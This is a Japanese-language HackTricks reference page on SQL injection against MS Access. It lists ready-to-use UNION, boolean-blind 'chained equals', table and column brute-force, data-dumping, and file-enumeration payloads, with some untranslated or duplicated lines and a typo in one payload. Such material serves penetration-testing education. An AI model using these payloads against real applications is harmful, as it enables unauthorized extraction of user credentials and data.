12 KiB
MS Access SQLインジェクション
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェック!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
オンラインプレイグラウンド
DBの制限
文字列の連結
文字列の連結は & (%26)
と + (%2b)
の文字で可能です。
1' UNION SELECT 'web' %2b 'app' FROM table%00
1' UNION SELECT 'web' %26 'app' FROM table%00
コメント
MS Accessにはコメントが存在しませんが、クエリの最後をNULL文字で削除することが可能だと言われています:
1' union select 1,2 from table%00
If this is not working you could always fix the syntax of the query:
もしこれがうまくいかない場合は、常にクエリの構文を修正することができます:
1' UNION SELECT 1,2 FROM table WHERE ''='
スタッククエリ
サポートされていません。
LIMIT
LIMIT
演算子は実装されていません。しかし、TOP
演算子を使用して、SELECT クエリの結果を最初の N 行に限定することが可能です。TOP
は引数として整数を受け取り、返される行数を表します。
1' UNION SELECT TOP 3 attr FROM table%00
LAST
を使用すると、最後からの行を取得できます。
UNION クエリ/サブクエリ
SQLiでは通常、他のテーブルから情報を抽出するために新しいクエリを実行したいと思います。MS Accessでは、サブクエリや追加のクエリでは FROM
が指定されている必要があります。
したがって、UNION SELECT
や UNION ALL SELECT
、条件内の括弧で囲まれた SELECT
を実行する場合、常に 有効なテーブル名を伴う FROM
を指定する必要があります。
従って、有効なテーブル名を知る必要があります。
-1' UNION SELECT username,password from users%00
チェーンイコール + サブストリング
{% hint style="warning" %} これにより、テーブルの名前を知らなくても、現在のテーブルの値を抽出することができます。 {% endhint %}
MS Access では '1'=2='3'='asd'=false
のような奇妙な構文が許可されています。通常、SQLインジェクションは WHERE
句の中にあるため、これを悪用することができます。
MS AccessデータベースでSQLiがあり、カラム名がusernameであると知っている(または推測している)場合、チェーンイコール技術を使用したときのWebアプリの異なるレスポンスを確認し、Mid
関数を使用してサブストリングを取得することで、ブール型インジェクションを使用して内容を抽出することができます。
'=(Mid(username,1,3)='adm')='
テーブルの名前とダンプする列を知っている場合、Mid
、LAST
、TOP
を組み合わせてブール型SQLiを介してすべての情報を漏洩させることができます:
'=(Mid((select last(useranme) from (select top 1 username from usernames)),1,3)='Alf')='
Feel free to check this in the online playground.
テーブル名のブルートフォース
チェーンイコールズ技術を使用して、以下のようにテーブル名をブルートフォースすることもできます:
'=(select+top+1+'lala'+from+<table_name>)='
伝統的な方法も利用できます:
-1' AND (SELECT TOP 1 <table_name>)%00
オンラインプレイグラウンドで自由にチェックしてください。
- Sqlmap 一般的なテーブル名: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt
- 別のリストはこちらにあります http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
列名のブルートフォース
現在の列名をブルートフォースすることができます。チェーンイコールのトリックを使って:
'=column_name='
または、group byを使用して:
-1' GROUP BY column_name%00
または、以下の方法で別のテーブルの列名をブルートフォースできます:
'=(SELECT TOP 1 column_name FROM valid_table_name)='
-1' AND (SELECT TOP 1 column_name FROM valid_table_name)%00
データのダンプ
既にチェーンイコールズ技術について説明しました。これは現在および他のテーブルからデータをダンプするために使用します。しかし、他にも方法があります:
IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')
要約すると、このクエリは「if-then」ステートメントを使用して、成功した場合は「200 OK」を、そうでない場合は「500 Internal Error」をトリガーします。TOP 10オペレーターを利用することで、最初の10件の結果を選択することができます。その後のLASTの使用により、10番目のタプルのみを考慮することができます。その値に対して、MIDオペレーターを使用することで、単純な文字比較を行うことができます。MIDとTOPのインデックスを適切に変更することで、「username」フィールドの内容をすべての行についてダンプすることができます。
時間ベース
その他の興味深い関数
Mid('admin',1,1)
位置1から長さ1の部分文字列を取得します(初期位置は1です)LEN('1234')
文字列の長さを取得しますASC('A')
文字のASCII値を取得しますCHR(65)
ASCII値から文字列を取得しますIIF(1=1,'a','b')
if thenCOUNT(*)
アイテム数をカウントします
テーブルの列挙
こちらからデータベース内のテーブル名を取得するクエリを見ることができます:
select MSysObjects.name
from MSysObjects
where
MSysObjects.type In (1,4,6)
and MSysObjects.name not like '~*'
and MSysObjects.name not like 'MSys*'
order by MSysObjects.name
ただし、**`MSysObjects` テーブルを読み取る権限がない** SQLインジェクションを見つけることが非常に一般的です。
## ファイルシステムアクセス
### Webルートディレクトリの完全なパス
**Webルートの絶対パスを知ることは、さらなる攻撃を容易にする可能性があります**。アプリケーションエラーが完全に隠されていない場合、存在しないデータベースからデータを選択しようとすることでディレクトリパスが明らかになることがあります。
`http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
MS Accessは、**エラーメッセージにWebディレクトリの完全なパス名を含んで応答します**。
### ファイル列挙
以下の攻撃ベクトルを使用して、**リモートファイルシステム上のファイルの存在を推測することができます**。指定されたファイルが存在する場合、MS Accessはデータベース形式が無効であることを知らせるエラーメッセージをトリガーします:
`http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\boot.ini'%00`
ファイルを列挙する別の方法は、**データベース.テーブル項目を指定することです**。**指定された**ファイルが**存在する場合**、MS Accessは**データベース形式のエラーメッセージを表示します**。
`http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\boot.ini.TableName%00`
### .mdbファイル名の推測
**データベースファイル名 (.mdb)** は以下のクエリで推測できます:
`http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00`
ここで、**name\[i]は.mdbファイル名**であり、**realTableはデータベース内に存在するテーブルです**。MS Accessは常にエラーメッセージをトリガーしますが、無効なファイル名と有効な.mdbファイル名を区別することが可能です。
### .mdbパスワードクラッカー
[**Access PassView**](https://www.nirsoft.net/utils/accesspv.html) は、Microsoft Access 95/97/2000/XPまたはJet Database Engine 3.0/4.0のメインデータベースパスワードを回復するために使用できる無料のユーティリティです。
## 参考文献
* [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)で</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをチェックしてください。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローしてください**。
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。
</details>